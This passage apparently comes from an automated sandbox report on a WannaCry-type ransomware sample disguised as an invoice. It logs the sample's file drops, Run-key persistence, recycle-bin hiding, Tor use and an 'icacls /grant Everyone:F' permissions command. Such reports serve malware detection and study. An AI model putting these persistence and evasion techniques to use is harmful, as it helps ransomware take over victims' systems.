            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\~SD1F4E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\~SD1F4F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\~SD1F50.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\~SD1F51.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\~SD1F62.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\~SD1F63.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\~SD1F64.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\~SD1F65.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\~SD1F85.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\~SD1F86.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\~SD1F87.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\~SD1F98.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\~SD945B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\~SD945C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\~SD945D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\~SD945E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\~SD945F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\~SD9460.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\~SD9461.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\~SD9462.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\~SD9463.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\~SD9464.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\~SD9465.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\~SD9466.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\~SD9467.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\~SD9468.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\~SD9469.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\~SD946A.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\~SD946B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\~SD946C.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\~SD947D.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\~SD947E.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\~SD947F.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\~SD9480.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\~SD9481.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\~SD9482.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\~SD9483.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\~SD9484.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\~SD9485.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\~SD9486.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\~SD9487.tmpJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ubykpkpwzybxbgo789
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ubykpkpwzybxbgo789

            Hooking and other Techniques for Hiding and Protection

            barindex
            Creates files in the recycle bin to hide itself
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\~SD4959.tmpJump to behavior
            May use the Tor software to hide its network traffic
            Source: @WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drBinary or memory string: onion-port
            Moves itself to temp directory
            Source: c:\users\user\desktop\request for quotation (rfq_196).zip.zipFile moved: C:\Users\user\AppData\Local\Temp\20.WNCRYTJump to behavior
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
